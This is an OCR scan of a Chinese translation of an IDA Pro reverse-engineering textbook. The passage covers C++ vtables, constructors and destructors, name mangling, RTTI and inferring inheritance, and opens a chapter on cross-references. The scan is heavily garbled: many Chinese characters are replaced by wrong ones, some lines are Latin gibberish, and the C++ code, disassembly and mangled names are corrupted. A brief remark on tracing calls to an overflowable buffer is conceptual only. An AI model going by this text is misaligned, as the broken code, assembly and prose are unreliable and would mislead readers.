在 3 次 调用 member func 的 过 程 中 ,this 分 别 接 有 党 了 &object1、&object2 和 p obj 这 3 个 值 。 
我 们 最 好 是 把 this 看 成 是 传递 到 所 有 非 静 态 成 员 困 数 的 第 一 个 隐藏 参数 。 如 第 6 童 所 述 ， 
Microsoft Visual C++ 利用 thiscall 调用 约定 ， 并 将 this 传递 到 ECX 寄存 大 中 。GNU gH EAT 
则 把 this 看 做 是 非 静态 成 员 困 数 的 第 一 个 (最 左边 ) 参数 ， 并 在 调用 该 函数 之 前 将 用 于 调用 也 
数 的 对 象 的 地 址 作为 最 后 一 项 压 入 栈 中 。 

从 逆 回 工程 的 角度 看 ， 在 调用 吗 数 之 前 ， 将 一 个 地 址 转移 到 ECX 寄存 右 中 可 能 意味 着 两 件 
事情 。 首 先 ， 该 文件 使 用 Visual C++ 编译 ; 其 次 ， 该 图 数 是 一 个 成 员 函 数 。 如 采 同 一 个 地 址 被 传 
递 给 两 个 或 更 多 也 数 ， 我们 可 以 得 到 结论 ， 这 些 函 数 全 都 属于 同一 个 类 层次 结构 。 

在 一 个 子 数 中 ， 在 初始 化 之 前 使 用 ECX ARAWAT LECA T ECX, J HIZK 
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可 能 是 一 个 成 员 孙 数 (虽然 该 函数 可 能 只 是 使 用 了 fastcall 调用 约定 )。 另 外 ， 如 果 发 现 一 个 函 
数 向 其 他 函数 传递 this 指针 ， 则 这 些 函 数 可 能 和 传递 this 的 函数 属于 同一 个 类 。 

使 用 g++ 编译 的 代码 较 少 调用 成 员 函 数 。 但 是 ， 如 果 一 个 函数 没有 把 指针 作为 它 的 第 一 个 参 
Tk, WEBES Wo PRA 


8.7.2 虚 函 数 和 虚 表 


Dë POI T E C++ 程序 中 实现 多 态 行为 。 编 详 希 会 为 每 一 个 包含 虚 男 数 的 类 (〈 或 通过 继承 得 
到 的 子 类 ) 生成 一 个 表 , 其 中 包含 指 癌 类 中 每 一 个 虚 消 数 的 指针 。 这样 的 表 就 叫做 虚 表 ( vtable )。 
此 外 ,每 个 包含 虚 函 数 的 类 都 获得 另外 一 个 数据 成 员 , 用 于 在 运行 时 指 癌 适当 的 虚 表 。 这 个 成 员 
通常 叫做 虚 表 指针 ( vtable pointer )， 并 且 是 类 中 的 第 一 个 数据 成 员 。 在 运行 时 创建 对 象 时 ， 对 和 象 
的 虚 表 指针 将 设置 为 指 回 合适 的 虚 表 。 如 有 果 该 对 象 调 用 一 个 虚 困 数 , 则 通过 在 该 对 象 的 虚 表 中 进 
行 查询 来 选择 正确 的 国 数 。 因 此 ， 虚 表 是 在 运行 时 解析 虚 郧 数 调用 的 基本 机 人 制 。 

下 面 我 们 举例 说 明 虚 表 的 作用 。 以 下 面 的 C++ 类 定义 为 例 : 




















classBaseclass{ OO 
public: 
BaseClass(); 
virtual void vfunci() = 0; 
virtual void vfunc2(); 
virtual void vfunc3(); 
virtual void vfunc4(); 
private: 
int x; 
int y; 
class SubClass : public BaseClass { 
public: 
SubClass(); 
virtual void vfunci(); 
virtual void vfunc3(); 
virtual void vfunc5(); 
private: 
int 25 
B 
在 这 个 例子 中 ,SubClass 是 BaseClass 的 一 个 子 类 。BaseClass 由 4 个 虚 函 数组 成 ,而 SubClass 
则 包含 5 个 虚 函 数 ( BaseClass 中 的 4 个 孔 数 加 上 一 个 新 函数 vfunc5 )。 在 BaseClass 中 ， 其 声明 
使 用 了 -0， 说 明 vfuncl 是 一 个 纯 虚 函 数 。 纯 虚 消 数 在 它们 的 声明 类 中 没有 实现 ， 并 且 必 须 在 一 个 
子 类 被 视 为 具体 类 之 前 ， 在 这 个 子 类 中 被 重 写 。 换 言 之 ,没有 名 为 BaseClass::vfuncl 的 函数 ， 
百 到 一 个 子 类 提供 一 次 实现 , 也 没有 对 象 能 够 被 实例 化 。SubClass 提供 了 这 样 一 个 实现 ， 因 此 可 
以 创建 SubClass 的 对 象 。 
ARR, BaseClass 似乎 包含 2 个 数据 成 员 ， 而 SubClass 则 包含 3 个 成 员 。 但 是 ， 我 们 前 
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面 提 到 ， 任 何 包 含 虚 函数 (无 论 是 本 身 包 含 还 是 继承 得 来 ) 的 类 也 包含 一 个 虚 表 指针 。 因 此 ， 
BaseClass 类 型 的 实例 化 对 象 实际 上 有 3 个 数据 成 员 ， 而 SubClass 类 型 的 实例 化 对 象 则 有 4 个 数 
据 成 员 ， 且 它们 的 第 一 个 数据 成 员 都 是 虚 表 指针 。 在 类 SubClass 中 ， 虚 表 指 针 实 际 上 由 类 
BaseClass 继承 得 来 , 而 不 是 专门 为 类 SubClass 引入 。 图 8-14 是 一 个 简化 后 的 内 存 布局 ， 它 动态 
分 配 了 一 个 SubClass 类 型 的 对 象 。 在 创建 对 象 的 过 程 中 ， 编 译 需 确保 新 对 象 的 虚 表 指针 指向 正 
确 的 虚 表 ( 本 例 中 为 类 SubClass 的 虚 表 )。 











BaseClass 虚 表 


&purecal | 
&BaseClass: :vfunc2 
BaseClass *bc-new SubClass(); 


一 一 &BaseClass: :vfunc3 
&BaseClass: :vfunc4 


SubClass 虚 表 


&subClass: :vfuncl 
&BaseClass: :vfunc2 
&SubClass: :vfunca 
&BaseClass: :vfunc4 
—— &SubClass: :vfuncb 
Held | ubClass: unc 


只 读数 据 
( .rdata/.rodata ) 


图 8-14 ”一 个 简单 的 虚 表 布局 


值得 注意 的 是 ，SubClass 中 包含 两 个 指向 属于 BaseClass 的 函数 ( BaseClass::vfunc2 和 
BaseClass::vfunc4 ) 的 指针 。 这 是 因为 SubClass 并 没有 重 写 任何 一 个 水 数 ， 而 是 由 BaseClass 继 
承 得 到 这 些 函 数 。 图 中 还 显示 了 纯 虚 洱 数 的 典型 处 理 方法 。 由 于 没有 针对 纯 虚 也 数 
BaseClass::vfuncl 的 实现 ， 因 此 ,在 BaseClass 的 虚 表 中 并 没有 存储 vfuncl 的 地 址 。 这 时 ， 编 
详 大 会 插入 一 个 错误 处 理 困 数 的 地 址 ,， 通 和 ， 该 旺 数 名 为 purecall, MEE, XC PRAES ZR 
调用 ， 但 万 一 被 调用 ， 它 会 令 程序 终止 。 

使 用 虚 表 指针 导致 的 一 个 后 果 是 ， 在 操纵 IDA 中 的 类 时 ， 你 必须 考虑 到 虚 表 指针 。 前 面 我 
们 讲 过 ，C++ 类 是 C 结构 体 的 一 种 扩展 。 因 此 ， 我 可 以 利用 IDA 的 结构 体 定义 来 定义 C++ 类 的 
布局 。 对 于 包含 虚 困 数 的 类 ， 你 必须 将 一 个 虚 表 指针 作为 类 中 的 第 一 个 字段 。 在 计算 对 象 的 总 大 
小 时 ， 也 必须 考虑 到 虚 表 指针 。 这 种 情况 在 使 用 new 操作 符 " 动 态 分 配对 象 时 最 为 明显 ， 这 时 ， 

















p vftable 



































(D new 操 作 符 在 C++ 中 用 于 动态 内 存 分 配 ,与 C 中 的 malloc 非常 相似 ( 尽管 new 是 C++ 语言 中 的 内 置 运算 符 , 而 mal1oc 
仅仅 是 一 个 标准 库 函 数 )。 
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传递 给 new 的 大 小 值 不 仅 包 括 类 〈 以 及 任何 超 类 ) 中 的 所 有 显 式 声 明 的 字段 占用 的 空间 ， 而 且 包 
括 虚 表 指 针 所 需 的 任何 空间 。 

下 面 的 例子 动态 创建 了 SubClass 的 一 个 对 象 , 它 的 地 址 保存 在 BaseClass 的 一 个 指针 中 。 然 
后 ， 这 个 指针 被 传递 给 一 个 函数 (call vfunc )， 它 使 用 该 指针 来 调用 vfunc3。 


void call vfunc(BaseClass *b) { 
b-»vfunc3(); 
} 


int main() { 
BaseClass *bc = new SubClass(); 
call vfunc(bc); 


由 于 vfunc3 是 一 个 虚 函 数 ， 因 此 ， 在 这 个 例子 中 ， 编 译 磊 必须 确保 调用 subClass::vfunca, 
因为 指针 指向 一 个 SubClass 对 象 。 下 面 call vfunc 的 反 汇 编 版 本 说 明了 如 何 解 析 虚 函数 调用 : 





.text:004010A0 call vfunc proc near 

. text :004010A0 

.text:004010A0 b - dword ptr 8 

. text :004010A0 

. text : 004010A0 push ebp 

. text :004010A1 mov ebp, esp 

. text :004010A3 mov eax, [ebp«b] 
. text :004010A6 mov edx, [eax] 

. text :004010A8 mov ecx, [ebp«b] 
. text: 004010AB mov eax, [edx«8] 
. text :004010AE ecall eax 

. text: 004010B0 pop ebp 

. text :004010B1 retn 

.text:004010B1 call vfunc endp 








在 @ 处 , 虚 表 指针 从 结构 体 中 读 取 出 来 ,保存 在 EDX 寄存 需 中 。 由 于 参数 b 指向 一 个 SubC1ass 
对 象 ， 这 里 也 将 是 SubClass 的 虚 表 的 地 址 。 在 @ 处 ， 虚 表 被 编 入 索引， 将 第 三 个 指针 (在 本 例 
中 为 SubClass::vfunca 的 地 址 ) 读 入 EAX 寄存器。 最 后 ， 在 目 处 调用 虚 函 数 。 

值得 注意 的 是 ，@ 处 的 虚 表 索引 操作 非常 类 似 于 结构 体 引 用 操作 。 实 际 上 ， 它 们 之 间 并 无 区 
别 。 因此, 我 们 可 以 定义 一 个 结构 体 来 表示 一 个 类 的 虚 表 的 布局 ,然后 利用 这 个 已 定义 的 结构 体 
来 提高 反 汇 编 代 但 清单 的 可 谈 性 ， 如 下 所 示 : 











00000000 SubClass vtable struc ; (sizeof-0x14) 


00000000 vfunci dd ? 
00000004 vfunc2 dd ? 
00000008 vfunc3 dd ? 
0000000C vfunc4 dd ? 
00000010 vfunc5 dd ? 


00000014 SubClass vtable ends 
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这 个 结构 体 允 许 将 虚 表 引 用 操作 重新 格式 化 成 以 下 形式 : 


.text:004010AB mov eax, [edx«SubClass vtable.vfunc3] 


8.7.3. 对象 生命 周期 





了 解 对 象 的 构建 和 撤销 机 制 , 有 助 于 明确 对 象 的 层次 结构 和 骸 套 对 象 关系 ,并 有 助 于 迅速 确 
E ZETA E PKI RATHA KO o 

IERSE, E KRETE Ki AEA main KATH. T2 BU 
DIS DIr RATER REA ATR BJ PRICE E FEDSUP SECUS] HE FEHR, 00] A FA HB 
HJ PRAG, CAE PROUD V4 H1. 但是， 如 果 对 和 象 在 一 个 块 语 句 中 声明 ， IA, "CDI: PROCHE 
到 这 个 块 被 输入 时 才 被 调用 ( 如果 它 确实 被 输入 的 话 )。 如 果 对 象 在 程序 堆 中 动态 分 配 ， 则 创建 
对 象 分 为 两 个 步骤 。 第 一 步 ， 调 用 new 操作 符 分 配对 和 象 的 内 存 。 第 二 步 ， 调 用 构造 函数 来 初始 化 
对 象 ,微软 的 Visual C++ 与 GNU 的 g++ 的 主要 区 别 在 于 , Visual C++ 可 确保 在 调用 构造 函数 之 前 ， 
new 的 结果 不 为 空 值 (null )。 

执行 一 个 构造 函数 时 ， 将 会 发 生 以 下 操作 。 

(1) 如 条 类 拥有 一 个 超 类 ， 则 调用 超 类 的 构造 栅 数 。 

(2) 如 果 类 包含 任何 虚 函 数 ， 则 初始 化 虚 表 指针 ， 使 其 指向 类 的 虚 表 。 注 意 ， 这 样 做 可 能 会 
复 善 一 个 在 超 类 中 初始 化 的 虚 表 指针 ， 这 实际 上 是 希望 的 结 采 。 

(3) 如 果 类 拥有 本 里 就 是 对 象 的 数据 成 员 ， 则 调用 这 些 数据 成 员 的 构造 函数 。 

(4) 最 后 ， 执 行 特 定 于 代码 的 构造 水 数 。 这 些 是 程序 员 指 定 的 、 表 示 构 造 函 数 C++ 行为 的 
代码 。 

构造 男 数 并 未 指定 返回 类 型 ， 但 由 Microsoft Visual C++ 生成 的 构造 另 数 实际 上 返回 到 EAX 
寄存 器 中 的 this 指针 。 无 论 如 何 ， 这 是 一 个 Visual C++ 实现 细节 ， 并 不 允许 C++ 程序 员 访 问 返 
回 值 。 

析 构 函数 基本 上 按 相 反 的 顺序 调用 。 对 于 全 局 和 静态 对 象 ， 析 构 洱 数 由 在 main 函数 结束 后 
执行 的 清理 代码 调用 。 栈 分 配 的 对 象 的 析 构 丽 数 在 对 象 脱离 作用 域 时 被 调用 。 推 分配 的 对 象 的 析 
构 函 数 在 分 配给 对 象 的 内 存 释 放 之 前 通过 delete 操作 符 调 用 。 

析 构 函数 执行 的 操作 与 构造 也 数 执行 的 操作 大 人 至 相同 , 唯一 不 同 的 是 , 它 以 大 概 相 反 的 顺序 
执行 这 些 操作 。 

(1) 如 有 果 类 拥有 任何 虚 消 数 ， 则 还 原 对 和 象 的 虚 表 指针 ， 使 其 指 癌 相关 类 的 虚 表 。 如 果 一 个 子 
类 在 创建 过 程 中 窗 盖 了 虚 表 指针 ， 就 需要 这 样 做 。 





















































CD 类 构造 函数 是 一 个 初始 化 函数 ， 它 在 创建 对 象 时 被 自动 调用 。 对 应 的 析 构 函数 为 可 选 函 数 ， 它 在 对 象 脱离 作用 域 
或 类 似 情况 下 被 调用 。 
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(2) 执行 程序 员 为 析 构 函数 指定 的 代码 。 

(3) 如 果 类 拥有 本 身 就 是 对 象 的 数据 成 员 ， 则 执行 这 些 成 员 的 析 构 函数 。 

(4) 最 后 ， 如 果 对 象 拥 有 一 个 超 类 ， 则 调用 超 类 的 析 构 函数 。 

通过 了 解 超 类 的 构造 函数 和 析 构 函数 何 时 被 调用 ， 我 们 可 以 通过 相关 超 类 也 数 的 调用 链 ， 
跟 踊 一 个 对 象 的 继承 体系 。 有 关 虚 表 的 最 后 一 个 问题 涉及 它们 在 程序 中 如 何 被 引用 。 一 个 类 的 
虚 表 被 直接 引用 ， 只 存在 两 种 情况 : 在 该 类 的 构造 函数 中 引用 和 在 析 构 也 数 中 引用 。 定 位 一 个 
虚 表 后 , 你 可 以 利用 IDA 的 数据 交叉 引用 功能 (参见 第 9 章 ) 迅速 定位 相关 类 的 所 有 构造 函数 
TUTTA] ep. 




















8.7.4 ”名 称 改编 


名 称 改 编 也 叫做 名 称 修饰 (name decoration )， 是 C++ 编译 器 用 于 区 分 重 载 函数 "的 机 制 。 为 
了 给 重 载 匈 数 生成 唯一 的 名 称 , 编译 帮 用 其 他 字符 来 修饰 函数 名 称 ， 用 来 编码 关于 子 数 的 各 种 信 
息 。 编 码 后 的 信息 通常 描述 孔 数 的 返回 类 型 、 浮 数 所 属 的 类 、 调 用 该 孔 数 所 需 的 参数 序列 (C 类 型 
和 顺序 )。 

名 称 改 编 是 C++ 程序 的 一 个 编译 右 实 现 细 方 ， 其 本 时 并 不 属于 CH. DI. Gier 
BE. 编译 带 供 应 商 已 经 开发 出 他 们 目 己 的 、 通 党 并 不 互相 兼容 的 名 称 改编 约定 。 全 好 ，IDA 理解 
Microsoft Visual C++, GNU g++ 以 及 其 他 一 些 编译 需 使 用 的 名 称 改 编 约 定 。 黑 认 人 情况 下 ， 在 程序 
中 过 到 一 个 改编 名 称 时 , IDA 会 在 反 汇 编 代 但 清单 中 该 名 称 出 现 的 位 置 以 注释 的 形式 显示 该 名 称 
的 原始 名 称 。 使 用 Options > Demangled Names 打开 如 图 8-15 所 示 的 对 话 框 ， 可 以 选择 IDA 的 名 
称 取消 改编 选项 。 




















Shaw demangled C++ names as: 


C Dont demande 


IT Assume GCC v3 X names 
Setup short names 


Setup long names | 
OK | Cancel | Help | 





图 8-15 ”取消 改编 名 称 的 显示 选项 





(D 在 C++ 中 ， 函 数 重 载 情况 下 ， 程 序 员 可 以 对 几 个 函数 使 用 相同 的 名 称 。 这 样 做 的 唯一 要 求 是 ， 重 载 末 数 的 每 个 版 
本 在 函数 接受 的 参数 类 型 的 顺序 和 数量 上 各 不 相同 。 换 言 之 ， 每 个 困 数 的 原型 必须 是 唯一 的 。 
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对 话 框 中 有 3 个 主要 选项 ， 用 于 控制 是 否 以 注释 的 形式 显示 取消 改编 的 名 称 ( demangled 
name )， 是 否 对 名 称 本 里 进行 取消 改编 ,或 者 根本 不 执行 取消 改编 。 以 注释 的 形式 显示 改编 名 称 
可 得 到 以 下 代码 : 








.text:00401050 ; protected: thiscall SubClass::SubClass(void) 
€ text:00401050 ??oSubClassQQIAEQXZ proc near 


. text:004010DC call ??oSubClassQGQIAEQXZ ; SubClass::SubClass(void) 
同样 ， 以 名 称 显 示 改 编 名 称 得 到 以 下 代码 : 
€ .text:00401050 protected: thiscall SubClass::SubClass(void) proc near 


. text: 004010DC call SubClass: :SubClass(void) 


HF, OexR— SAU SIL ViRBIE—1I, Ox py. 

Assume GCC v3.x ( RH GCC v3.x APR ) 复 选 杠 用 于 区 分 gH 2.9.x 版 本 与 ge 3.x Je S res s 
本 使 用 的 改编 方案 。 在 正常 情况 下 , IDA 应 自动 检测 g++ 编译 代码 中 使 用 的 命名 约定 。 Setup short 
names ( 设置 短 名 称 ) 和 Setup long names (设置 长 名 称 ) 按钮 为 取消 改编 名 称 的 格式 化 提供 了 细 
化 控制 ， 其 中 包括 大 量 选项 ， 相 关 信 息 请 查询 IDA 的 帮助 系统 。 

因为 改编 名 称 能 提供 大 量 与 也 数 签名 有 关 的 信息 ， 它 们 减少 了 DA 为 理解 传递 给 函数 的 参 
数 的 数量 和 类 型 所 需 的 时 间 。 如 果 一 个 二 进 制 文件 使 用 了 改编 名 称 , IDA 的 取消 改编 功能 会 立即 
揭示 所 有 名 称 被 改编 的 函数 的 参数 类 型 和 返回 类 型 。 相 反 ， 如 果 孔 数 并 未 使 用 改编 名 称 ， 你 必须 
花费 大 量 时 间 ， 对 进出 机 数 的 数据 流 进行 分 析 ， 从 而 确定 冰 数 的 签名 。 

















8.7.5 ”运行 时 类 型 识别 


C++ 提 供 各 种 操作 符 ， 可 进行 运行 时 检测 ， 以 确定 (typeid ) 和 检查 (dynamic cast) 一 
个 对 象 的 数据 类 型 。 为 实现 这 些 操 作 ，C++ 编 译名 必须 将 类 型 信息 航 入 到 一 个 程序 的 二 进 制 文 
件 中 ， 并 执行 能 够 百分之百 确定 一 个 多 态 对 象 的 类 型 的 过 程 ， 而 不 管 为 访问 该 对 象 被 取消 引用 
的 指针 类 型 。 然 而 ， 与 名 称 改 编 一 样 ，RITI (Runtime Type Identification， 运 行 时 类 型 识别 ) 
ID rä ée zt Nän. ， 而 不 是 一 个 语言 问题 ， 因 此 ， 编 译 融 没有 标准 的 方法 来 实现 RTTI 
功能 。 

我 们 将 简要 介绍 Microsoft Visual C++ 与 GNU g++ 的 RTTI 实现 之 间 的 异同 。 具 体 来 说 ， 我 们 
介绍 的 内 容 仅 仅 涉及 如 何 定位 RTTI 人 信息， 并 以 此 为 基础 ， 了 解 与 这 些 信息 有 关 的 类 名 称 。 有 关 
微软 的 RTTI 实 现 的 详细 讨论 , 请 参阅 8.7.7 节 ,其 中 详细 说 明了 如 何 迪 历 一 个 类 的 继承 体系 , 包 
括 如 何在 存在 多 继承 的 情况 下 跟踪 继承 体系 。 

以 下 面 这 个 利用 多 态 的 简单 程序 为 例 : 
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class abstract class { 
public: 
virtual int vfunc() = 0; 


B 


class concrete class : public abstract class { 
public: 
concrete class(); 
int vfunc(); 
}; 
void print type(abstract class *p) { 
cout << typeid(*p).name() << endl; 
J 


int main() { 
abstract class *sc - new concrete class(); 
print type(sc); 





print type 国 数 必须 正确 打印 指针 p 所 指 癌 的 对 象 的 类 型 。 在 这 个 例子 中 ， 基 于 main mär 
创建 了 一 个 concrete_class 对 象 这 个 事实 , 我 们 立即 意识 到 ，concrete_class 必须 被 打印 。 这 里 
我 们 需要 回答 的 问题 是 : print_type， 更 具体 的 说 是 typeid， 如 何 知道 p 指向 的 对 象 的 类 型 ? 

问题 的 答案 非常 简单 。 因 为 每 个 多 态 对 象 都 包含 一 个 指 辐 虚 表 的 指针 ， 编 译 希 将 类 的 类 型 信 
姑 与 类 虚 表 存储 在 一 起 。 具 体 来 说 , 编译 带 在 类 虚 表 之 前 放置 一 个 指针 ， 这 个 指针 指 问 一 个 结构 
体 ， 其 中 包含 用 于 确定 拥有 虚 表 的 类 的 名 称 所 需 的 信息 。 在 g++ 代码 中 ， 这 个 指针 指 癌 一 个 
type info 结构 体 ， 其 中 包含 一 个 指 问 类 名 称 的 指针 。 在 Visual C++ 代 码 中 ， 指 针 指 癌 一 个 微软 
RTTIComplete0bjectLocator 结构 体 ， 其 中 义 包 含 一 个 指向 TypeDescriptor 绪 构 体 的 指针 。 
TypeDescriptor 结构 体 中 则 包含 一 个 指定 多 态 类 名 称 的 字符 数组 。 

需要 注意 的 是 ， 只 有 使 用 typeid 或 dynamic cast 操作 符 的 C++ 程序 才 需 要 RTTI 信息 。 多 
数 编 译 器 都 提供 一 些 选 项 ， 禁 止 不 需要 RTTI 的 二 进 制 文件 生成 RTTI。 因 此 ， 如 果 RTTI Dn 
巧 丢 失 ， 你 不 应 感到 奇怪 。 


8.7.6 ”继承 关系 


如 果 深 入 RTTI 实现 ， 你 会 发 现 ， 你 可 以 弄 清 继承 关系 。 但 是 ， 要 了 人 解 继 承 关 系 ， 你 必须 理 
解 编译 需 的 特殊 RTTI 实现 。 而 且 ， 如 果 一 个 程序 不 使 用 typeid 或 dynamic cast 运算 符 ，RTTI 
言 息 可 能 并 不 存在 。 缺 少 RITTI 信 息 ， 又 该 使 用 什么 技巧 来 确定 C++ 类 中 的 继承 关系 呢 ? 

确定 某 个 继承 体系 的 最 简单 方法 是 , 观察 在 创建 对 象 时 被 调用 的 超 类 构造 另 数 的 调用 链 。 内 
WC "构造 函数 是 这 种 方法 成 功 与 否 的 唯一 最 大 障碍 。 如 果 使 用 了 内 联 构 造 函 数 ， 我 们 就 不 可 能 知 





























(D 在 C/C++ 程序 中 ,一 个 声明 为 inline 的 函数 将 被 编译 器 作为 宏 处 理 ， 并 且 该 函数 的 代码 将 被 扩展 ， 以 替代 一 个 显 
式 函 数 调用 。 由 于 存在 汇编 语言 调用 语句 是 一 个 函数 被 调用 的 确 羡 证 据 ,使 用 内 联 函 数 则 倾向 于 隐藏 了 函数 被 调 
用 这 一 事实 。 
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道 一 个 超 类 构造 函数 实际 上 已 经 被 调用 。 
分 析 和 比较 虚 表 是 男 一 种 用 于 确定 继承 关系 的 方法 。 例 如 ， 如 图 8-14 所 示 ， 在 比较 虚 表 的 
过 程 中 ， 我 们 注意 到 ，SubClass 的 虚 表 中 包含 两 个 相同 的 指针 ， 它 们 也 出 现在 类 BaseClass 的 虚 
表 中 。 为 此 ， 我 们 可 以 轻易 得 出 结论 ，BaseClass 与 SubClass 之 间 必 是 存在 着 某 种 关系 ， 但 到 底 
SubClass 是 BaseClass 的 子 类 ， 还 是 BaseClass 是 SubClass 的 子 类 呢 ? 遇 到 这 类 情况 ， 我 们 可 以 
应 用 下 面 的 一 条 或 多 条 指导 原则 ， 设 法 了 解 它 们 之 间 的 关系 。 
口 如 果 两 个 虚 表 包含 相同 数量 的 条 目 ， 则 与 这 两 个 虚 表 对 应 的 类 之 间 可 能 存在 着 某 种 继承 
关系 。 
口 ARAS XX 的 虚 表 包含 的 条 目 比 类 Y 多, 则 XX 可 能 是 Y 的 子 类 。 
D 如 有 果 义 包含 的 条 目 也 可 以 在 YY 的 虚 表 中 找到 , 则 必定 存在 下 面 一 种 关系 : 义 是 YY 的 子 类 ， 
Y 是 X 的 子 类 ， 或 者 X 和 YY 全 都 是 同一 个 超 类 Z 的 子 类 。 
O 如 有 果 义 包含 的 条 目 也 可 以 在 类 YY 的 虚 表 中 找到 , 并且 X 的 虚 表 中 至 少 包 含 一 个 纯 调 用 条 
目 ， 而 的 虚 表 中 并 没有 这 个 条 日， 那么 Y 是 XX 的 子 类 。 
虽然 上 面 罗 列 的 并 不 全 面 ， 但 是 我 们 可 以 使 用 这 些 指导 原则 来 推 断 图 8-14 中 BaseClass 与 
SubClass 之 间 的 关系 。 上 面 的 后 3 条 原则 全 都 适用 于 这 个 例子 ,但 仅仅 根据 对 虚 表 的 分 析 ， 由 最 
后 一 条 原则 可 得 出 结论 : SubClass 是 BaseClass 的 子 类 。 






































8.7.7 ”C++ 逆向 工程 参考 文献 


有 关 逆 癌 工程 已 编译 C++ 代码 的 补充 阅读 内 容 ， 请 参阅 下 面 这 些 详 尽 的 参考 文献 。 
口 Igor Skochinsky 的 文 草 “Reversing Microsoft Visual C++ Part II: Classes, Mehtods and RTTT , 
地 址 是 http://www.openrce.org/articles/full view/23. 
口 Paul Vincent Sabanal 和 Mark Vincent Yason 的 论文 “Reversing C++”, 访 问 地 址 是 http://www. 
blackhat.com/presentations/bh-dc-07/Sabanal Yason/Paper/bh-dc-07-Sabanal Yason-WP.pdf。 
虽然 这 些 文 草 中 的 许多 细节 主要 适用 于 使 用 Microsoft Visual C++ 编译 的 程序 , 但 许多 概念 也 
同样 适用 于 使 用 其 他 C++ 编译 需 编 译 的 程序 。 

















8.8 小结 


除了 最 简单 的 程序 外 , 你 可 能 会 在 各 种 程序 中 遇 到 复杂 的 数据 类 型 。 了 解 如 何 访问 复杂 数据 
结构 中 的 数据 ,以 及 如 何 收集 有 关 这 些 复 杂 数 据 结 构 的 布局 的 线索 ,是 一 项 基本 的 逆 癌 工程 技巧 。 
IDA 提供 大 量 功能 , 专门 用 于 满足 你 在 处 理 复 杂 效 据 结构 方面 的 需求 。 熟 悉 这 些 功能 将 大 大 提高 
你 在 理解 数据 类 型 方面 的 能 力 ， 从 而 将 更 多 的 精力 放 在 理解 如 何 及 为 何 操纵 数据 上 。 

在 下 一 音 中 ， 我 们 介绍 交叉 引用 和 图 形 ， 并 结束 对 IDA 基本 功能 的 讨论 。 随 后 ， 我 们 将 讨 
论 IDA 的 高 级 功能 ， 正 是 这 些 功能 将 IDA 与 其 他 逆 癌 工程 工具 区 别 开 来 。 
































交叉 引用 与 绘图 功能 


dps cnn 人 们 提出 的 一 些 常 见 问题 包括 ; “这 个 函数 是 从 什么 地 
士 方 调用 的 ”和 “哪些 函数 访问 了 这 个 数据 ”。 这 些 及 其 他 类 似 的 问题 其 实 是 对 程序 中 各 











种 资源 的 引用 进行 分 类 。 有 两 个 例子 可 说 明 这 类 问题 的 用 处 。 

假设 你 已 经 确定 了 一 个 函数 的 位 置 ， 该 函数 包含 一 个 栈 分 配 的 可 溢出 的 缓冲 区 ， 你 可 对 此 
加 以 利用 。 由 于 这 个 函数 可 能 座次 隐藏 在 一 个 复杂 的 应 用 程序 中 ， 因 此 ， 下 一 步 你 需要 确定 到 
压 如 何 访 问 该 函数 。 除 非 你 能 够 执行 这 个 也 数 ， 否 则 它 就 对 你 片 无 用 处 。 我 们 会 提出 这 样 一 个 
问题 : 哪些 函 数 会 调用 这 个 易 受 攻击 的 函数 呢 ?” 而 数据 是 由 哪些 函数 传递 给 易 受 攻击 的 函数 的 
呢 。 在 你 回溯 浒 在 的 调用 链 ， 碍 找 那 个 有 助 于 你 利用 缓冲 区 汶 出 的 晒 数 调用 时 ， 你 必须 继续 上 
述 推 理 过 程 。 

为 外 ,如 果 一 个 二 进 制 文件 包含 大 量 ASCI FR, 你 会 党 得 其 中 至 少 有 一 个 字符 串 值 得 怀 
E, lll “Executing Denial of Service attack!" ( 拒绝 服务 攻击 )。 存 在 这 个 字符 串 表 明 这 个 二 进 制 
文件 确实 会 拒绝 服务 攻击 吗 ? 不 是 ， 它 只 是 表示 该 二 进 制 文件 碰巧 包含 上 述 特殊 的 ASCII 序列 。 
你 可 能 会 据 此 推 新 , 这 条 消息 可 能 会 在 实施 攻击 之 前 以 某 种 方式 显示 出 来 。 但 是 ， 你 需要 查找 相 
天 代码 ， 以 证 实 目 己 的 怀疑 。 那么 ,“ 程 序 从 什么 地 方 引 用 这 个 字符 串 呢 ?”” 这 个 问题 将 有 助 于 
你 迅速 跟踪 到 利用 该 字符 串 的 程序 位 置 ， 进 而 确定 具体 的 拒绝 服务 攻击 代码 。 

通过 强大 的 交叉 引用 功能 ，IDA 将 帮助 你 回答 这 些 问题 。IDA 提供 大 量 显示 和 访问 交叉 引 
用 数据 的 机 制 ， 包 括 图 形 生 成 功能 ， 它 以 更 加 直观 的 方式 显示 代码 与 数据 之 间 的 关系 。 在 本 章 
中 ， 我 们 将 讨论 IDA 提供 的 各 种 交叉 引用 信息 和 访问 交叉 引用 数据 的 工具 ， 以 及 解释 这 些 数 据 
的 方法 。 





























9.1 交叉 引用 


HJC, 逢 要 指出 的 是 , IDA 中 的 交叉 引用 通 笛 简称 为 xref。 如 采 引 用 的 是 一 个 IDA 3648391 
或 对 话 框 中 的 内 容 , 我 们 称 这 种 引用 为 xref。 对 于 其 他 引用 , 我 们 仍然 使 用 交叉 引用 这 一 术语 。 
在 IDA 中 有 两 类 基本 的 交叉 引用 : 代码 交叉 引用 和 数据 交叉 引用 。 这 两 种 引用 又 分 别 包含 
几 种 不 同 的 交叉 引用 。 每 种 交叉 引用 都 与 一 种 方 回 表 示 法 有 关 。 所 有 的 交叉 引用 都 是 在 一 个 地 址 
引用 为 一 个 地 址 。 这 些 地 址 可 能 是 代码 地 址 或 数据 地 址 。 如 琳 你 台 悉 图 论 ， 可 以 把 这 里 的 地 址 看 
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做 是 一 个 有 问 图 (directed graph ) 中 的 节点 ， 而 把 交叉 引用 看 做 是 图 中 的 边 。 图 9-1 可 帮助 你 还 
速 了 解 有 关 图 形 的 术语 。 在 这 个 简单 的 图 形 中 ， 两 条 有 问 边 (O6) 连接 了 3 个 市 点 (0). 


.text:080489DA jz error 9 
. text :080489DA push 0 © . text :08048A18 error: mov eax,edx © 


图 9-1 基本 的 图 形 组 件 


需要 注意 的 是 ， 节 点 也 叫做 顶点 〈vertice )。 有 回 边 则 使 用 往 头 表示 这 条 边 可 以 指 回 的 方 回 。 
在 图 9-1 中 ， 从 上 面 的 节点 可 以 到 达 下 面 的 两 个 节点 之 一 , 但 从 下 面 的 两 个 节点 却 无 法 到 达 上 面 
DI ES o 

代码 交叉 引用 是 一 个 非常 重要 的 概念 ， 因 为 它 可 帮助 IDA 生成 控制 流 图 形 和 函数 调用 图 形 ， 
我 们 将 在 本 章 后 面 讨论 这 些 图 形 。 

